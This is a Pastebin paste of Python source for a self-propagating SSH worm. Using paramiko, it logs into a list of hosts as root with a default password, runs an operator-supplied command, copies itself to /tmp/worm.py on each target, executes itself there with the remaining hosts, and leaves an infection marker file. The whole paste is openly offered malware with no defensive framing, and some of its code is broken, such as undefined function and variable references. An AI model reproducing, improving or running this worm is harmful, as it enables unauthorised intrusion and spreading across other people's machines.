SHARE
TWEET

Untitled

a guest Feb 27th, 2020 115 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import os
  2. import sys
  3. import time
  4. import json
  5. import socket
  6. import socketserver
  7. import pathlib
  8. import logging
  9.  
  10.  
  11. import paramiko
  12.  
  13.  
  14.  
  15. # logging.basicConfig(level=logging.INFO)
  16. # logger = logging.getLogger(__name__)
  17. INFECTION_MARKER = "/tmp/WormInfectionMarker.txt"
  18.  
  19.  
  20.  
  21. class Worm(object):
  22.     """
  23.    Worm implements chain to run command trought ssh and fetch stdout.
  24.    The worm copies itself into various folders.
  25.    """
  26.     def __init__(self):
  27.         command = sys.argv[1]
  28.         host_list = sys.argv[2].split(',')
  29.         current_host = socket.gethostbyname(socket.gethostname())
  30.         current_path = pathlib.Path(__file__).absolute()
  31.  
  32.         while current_host in host_list: host_list.remove(current_host)
  33.        
  34.         try:
  35.             parent = sys.argv[3]
  36.             with open('parent.txt', 'w') as parent_file:
  37.                 parent_file.write(parent)
  38.  
  39.         except IndexError:
  40.             parent = None
  41.        
  42.         self.username = 'root'
  43.         self.password = 'password'
  44.         self.current_host = current_host
  45.         self.host_list_str = ','.join(host_list)
  46.         self.current_path = current_path
  47.         self.parent = parent
  48.         self.data = []
  49.        
  50.         self.fetch_outputs(command, host_list)
  51.  
  52.     def fetch_outputs(self, command, host_list):
  53.         for host in host_list:
  54.             client = self.connect_to_ssh(host, 22)
  55.             if not client:
  56.                 continue
  57.  
  58.             infected = self.is_infected(client)
  59.             if not infected:
  60.                 result = self.run_command(client, command)
  61.                 if self.parent:
  62.                     print(result)
  63.                 else:
  64.                     j = '[' + result.replace('[]', '').replace('}{', '},{').replace("'", '"') + ']'
  65.                     d = json.loads(j)
  66.                     data.extend(d)
  67.  
  68.                 self.propagate(client, command)
  69.  
  70.             client.close()
  71.  
  72.     def connect_to_ssh(self, host, port):
  73.         """
  74.        Tries to connect to a SSH server
  75.        Returns:
  76.            True - Connection successful
  77.            False - Something went wrong
  78.        Args:
  79.            host - Target machine's IP
  80.            password - Password to use
  81.        """
  82.  
  83.         client = paramiko.SSHClient()
  84.         client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  85.         try:
  86.             print(f'Connecting to: {host}')
  87.             client.connect(host, port, self.username, self.password, timeout=15)
  88.             print('Successfully connected')
  89.  
  90.             return client
  91.         except Exception as e:
  92.             print(e)
  93.  
  94.         # except socket.error as e:
  95.         #     print('Computer is offline or port 22 is closed')
  96.         # except paramiko.ssh_exception.AuthenticationException:
  97.         #     print('Wrong Password or Username')
  98.         # except paramiko.ssh_exception.SSHException:
  99.         #     print('No response from SSH server')
  100.         # except:
  101.         #     print('Unknown error')
  102.  
  103.     def run_command(self, client, command):
  104.         """
  105.        Runs command thought SSH
  106.        """
  107.         stdin, stdout, stderr = client.exec_command(command)
  108.         result = stdout.read().decode('utf-8').replace('\n', '')
  109.  
  110.         return result
  111.  
  112.     def propagate(self, client, command):
  113.         print('Expoiting Target System')
  114.         with client.open_sftp() as sftp:
  115.             sftp.put(self.current_path, '/tmp/worm.py')
  116.  
  117.         client.exec_command('chmod a+x /tmp/worm.py')
  118.         ex_command = f'python -u /tmp/worm.py {command} {self.host_list_str} {self.current_host}'
  119.         result = run_command(client, ex_command)    
  120.  
  121.         if self.parent:
  122.             print(result)
  123.         else:
  124.             j = '[' + result.replace('[]', '').replace('}{', '},{').replace("'", '"') + ']'
  125.             d = json.loads(j)
  126.             data.extend(d)
  127.  
  128.            
  129.         self.mark_infected()
  130.         print('Copied and executed worm into the system')
  131.    
  132.     def is_infected(self, client):
  133.         infected = False
  134.         try:
  135.             with client.open_sftp() as sftp:
  136.                 sftp.stat(INFECTION_MARKER)
  137.  
  138.             infected = True
  139.         except:
  140.             print('This system is not infected')
  141.            
  142.         return infected
  143.  
  144.     def mark_infected(self):
  145.         with open(INFECTION_MARKER, 'w') as marker:
  146.             marker.write('I have infected your system')
  147.  
  148.  
  149. if __name__ == '__main__':
  150.     Worm()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top